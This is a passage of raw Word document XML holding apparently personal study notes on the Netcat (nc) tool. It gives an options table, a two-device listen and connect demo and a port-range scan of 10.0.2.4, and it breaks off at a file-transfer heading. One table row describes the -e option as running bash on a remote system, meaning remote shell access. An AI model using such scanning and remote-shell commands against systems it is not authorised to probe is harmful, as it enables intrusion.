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E1D3" w14:textId="6A8273C2" w:rsidR="00C7671D" w:rsidRDefault="00C7671D" w:rsidP="00547432">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00547432">
        <w:t>Netcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8FE88C" w14:textId="3FD5245D" w:rsidR="00BB5DF6" w:rsidRPr="00BB5DF6" w:rsidRDefault="00BB5DF6" w:rsidP="00E46A7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="404040"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The Netcat (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5DF6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5DF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>) command is a command-line utility for reading and writing data between two computer networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201D812" w14:textId="36E1A9BD" w:rsidR="00204D60" w:rsidRDefault="00C7671D" w:rsidP="00E46A7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="404040"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>nc [&lt;options&gt;] &lt;host&gt; &lt;port&gt;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1BCA" w14:paraId="2BACBC78" w14:textId="77777777" w:rsidTr="00E2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855DF3C" w14:textId="6F6F62D4" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E46A7E">
            <w:pPr>
              <w:rPr>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5161C5A8" w14:textId="0B39C471" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E4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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE89519" w14:textId="48581C65" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E4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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="7C02A6EA" w14:textId="77777777" w:rsidTr="0010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CC72003" w14:textId="2D76D835" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pPr>
              <w:rPr>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
            </w:pP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-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E23D375" w14:textId="43513B00" w:rsidR="00E21BCA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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F73E41A" w14:textId="1E514F5C" w:rsidR="00E21BCA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Use IPv4 only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="15ED56FA" w14:textId="77777777" w:rsidTr="00104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CCA4750" w14:textId="305E4687" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pPr>
              <w:rPr>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
            </w:pP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-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="471E758B" w14:textId="2BC4752C" w:rsidR="00E21BCA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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76903926" w14:textId="2ACFE171" w:rsidR="00E21BCA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Use IPv6 only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="15AF7C92" w14:textId="77777777" w:rsidTr="0010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D2E6526" w14:textId="04087855" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pPr>
              <w:rPr>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
            </w:pP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-U</w:t>
            </w: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br/>
            </w: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--unixsock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07EB42B7" w14:textId="53FD04E8" w:rsidR="00E21BCA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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="676B2D23" w14:textId="2CB222AE" w:rsidR="00E21BCA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Use Unix domain sockets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="025BD0E0" w14:textId="77777777" w:rsidTr="00104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84AB340" w14:textId="48E9445A" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pPr>
              <w:rPr>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
            </w:pP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-u</w:t>
            </w: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br/>
            </w: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--udp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34CB594B" w14:textId="37F0140D" w:rsidR="00E21BCA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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="782D712D" w14:textId="103E0B05" w:rsidR="00E21BCA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Use UDP connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="7B9BFCE8" w14:textId="77777777" w:rsidTr="0010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B2B82F4" w14:textId="2A424219" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pP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-g &lt;hop1, hop2,...&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F4BB33D" w14:textId="4AEE8FA0" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Connect mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76281AE0" w14:textId="3D08BF19" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Set hops for loose source routing in IPv4. Hops are IP addresses or hostnames.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="5220CBBE" w14:textId="77777777" w:rsidTr="00104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6F3C99B" w14:textId="63C62E3B" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pP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-p &lt;port&gt;</w:t>
            </w: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br/>
            </w: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--source-port &lt;port&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="118A1A80" w14:textId="44E88625" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Connect mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A275625" w14:textId="276F04D2" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Binds the Netcat source port to &lt;port&gt;.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="25264CF2" w14:textId="77777777" w:rsidTr="0010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A3E2FF1" w14:textId="6918BBC9" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pP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-s &lt;host&gt;</w:t>
            </w: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br/>
            </w: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--source &lt;host&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EC1F782" w14:textId="74E90381" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Connect mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52411097" w14:textId="2A3864E0" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Binds the Netcat host to &lt;host&gt;.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="5DF796B4" w14:textId="77777777" w:rsidTr="00104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2BE2518" w14:textId="5082A656" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pP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-l</w:t>
            </w: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br/>
            </w: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--listen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53A1AAFC" w14:textId="3F341D97" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Listen mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C297843" w14:textId="4D5FF65B" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Listens for connections instead of using connect mode.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="2A516E1D" w14:textId="77777777" w:rsidTr="0010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4CD5315" w14:textId="757AEC5A" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pP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-k</w:t>
            </w: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br/>
            </w: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--keep-open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53F90FD7" w14:textId="07CA3D19" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Listen mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14E18253" w14:textId="74969A0E" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Keeps the connection open for multiple simultaneous connections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="097A25B3" w14:textId="77777777" w:rsidTr="00104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8469B52" w14:textId="50A11135" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pP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-v</w:t>
            </w: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br/>
            </w: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--verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07C15E7A" w14:textId="4E1DFD7D" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20521EF3" w14:textId="6F927914" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Sets verbosity level. Use multiple times to increase verbosity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="64580967" w14:textId="77777777" w:rsidTr="0010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FB1206C" w14:textId="613BD7D8" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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</w:pPr>
            <w:r w:rsidRPr="00D31769"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-z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69358F4C" w14:textId="4FD462BE" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46C73C10" w14:textId="21DCF4BB" w:rsidR="00E21BCA" w:rsidRPr="00D31769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 w:rsidRPr="00D31769"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Report connection status without establishing a connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="6B15BB75" w14:textId="77777777" w:rsidTr="00104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316EFDF" w14:textId="51BA409B" w:rsidR="00E21BCA" w:rsidRPr="00D31769" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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-e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41FCFAC7" w14:textId="2BCE3221" w:rsidR="00E21BCA" w:rsidRPr="00D31769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Exe mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="212D8A0C" w14:textId="5095D436" w:rsidR="00E21BCA" w:rsidRPr="00D31769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 xml:space="preserve">We can assign a bash to run in remote system </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="30086E2D" w14:textId="77777777" w:rsidTr="0010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236459D" w14:textId="68576EFF" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pP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  <w:t>-w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="371975B2" w14:textId="157493D3" w:rsidR="00E21BCA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Wait</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66C50973" w14:textId="1EA645A5" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21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  <w:r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  <w:t>Wait for x sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21BCA" w14:paraId="00B2A656" w14:textId="77777777" w:rsidTr="00104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023176A" w14:textId="77777777" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21BCA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"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4D46151A" w14:textId="77777777" w:rsidR="00E21BCA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14A45DE4" w14:textId="77777777" w:rsidR="00E21BCA" w:rsidRDefault="00E21BCA" w:rsidP="00E21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404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="fa-IR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C24489D" w14:textId="0D044FE9" w:rsidR="00D31769" w:rsidRPr="00D31769" w:rsidRDefault="00D31769" w:rsidP="00D3176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</w:pPr>
      <w:r w:rsidRPr="00D31769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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>On device 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769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>, run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769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> command in listen mode and provide a port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702B96E" w14:textId="1CE970CB" w:rsidR="00D31769" w:rsidRPr="00D31769" w:rsidRDefault="00D31769" w:rsidP="00D31769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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31769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>nc -l</w:t>
      </w:r>
      <w:r w:rsidR="002F2483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>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769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>v 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4415FE12" w14:textId="65FC931F" w:rsidR="00D31769" w:rsidRDefault="00D31769" w:rsidP="00E46A7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A4E700" w14:textId="155887ED" w:rsidR="00D31769" w:rsidRDefault="00D31769" w:rsidP="00E46A7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> option activates listen mode, making device 1 the server. The output shows the device listening for connections due to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31769">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> option.</w:t>
      </w:r>
      <w:r w:rsidR="002F2483">
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F2483">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidR="002F2483" w:rsidRPr="002F2483">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>-k</w:t>
      </w:r>
      <w:r w:rsidR="002F2483">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> option ensures the connection stays open after a disconnect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25C0F5" w14:textId="77777777" w:rsidR="002F2483" w:rsidRPr="002F2483" w:rsidRDefault="002F2483" w:rsidP="002F248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</w:pPr>
      <w:r w:rsidRPr="002F2483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>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>. On device 2</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483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>, run the </w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483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> command with the IP address of device 1 and the port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968714A" w14:textId="77777777" w:rsidR="002F2483" w:rsidRPr="002F2483" w:rsidRDefault="002F2483" w:rsidP="002F2483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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2483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>nc -v 10.0.2.4 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352FEEC4" w14:textId="45D9F2B9" w:rsidR="002F2483" w:rsidRPr="002F2483" w:rsidRDefault="002F2483" w:rsidP="002F248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</w:pPr>
      <w:r w:rsidRPr="002F2483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 xml:space="preserve">3. Alternatively, </w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>scan multiple ports</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483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 xml:space="preserve"> on device 2 by adding a port range</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(-z)</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2483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>. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7ACA6" w14:textId="77777777" w:rsidR="002F2483" w:rsidRPr="002F2483" w:rsidRDefault="002F2483" w:rsidP="002F2483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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2483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>nc -zv 10.0.2.4 1230-1235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2400F1EF" w14:textId="5C9170F5" w:rsidR="00D31769" w:rsidRDefault="00E27EFF" w:rsidP="00E46A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">if we use it </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>without -z</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>connection established</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>other ports wont check</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A75B38" w14:textId="2AD6C56B" w:rsidR="00D6083E" w:rsidRDefault="00D6083E" w:rsidP="00E46A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A02112F" w14:textId="77777777" w:rsidR="00F56D5F" w:rsidRDefault="00F56D5F" w:rsidP="00547432">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD904B6" w14:textId="0BC51C30" w:rsidR="00F56D5F" w:rsidRPr="00321DE1" w:rsidRDefault="00F56D5F" w:rsidP="00321DE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</w:pPr>
      <w:r w:rsidRPr="00321DE1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>Create a listening connection on device 1 and redirect the file to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00321DE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
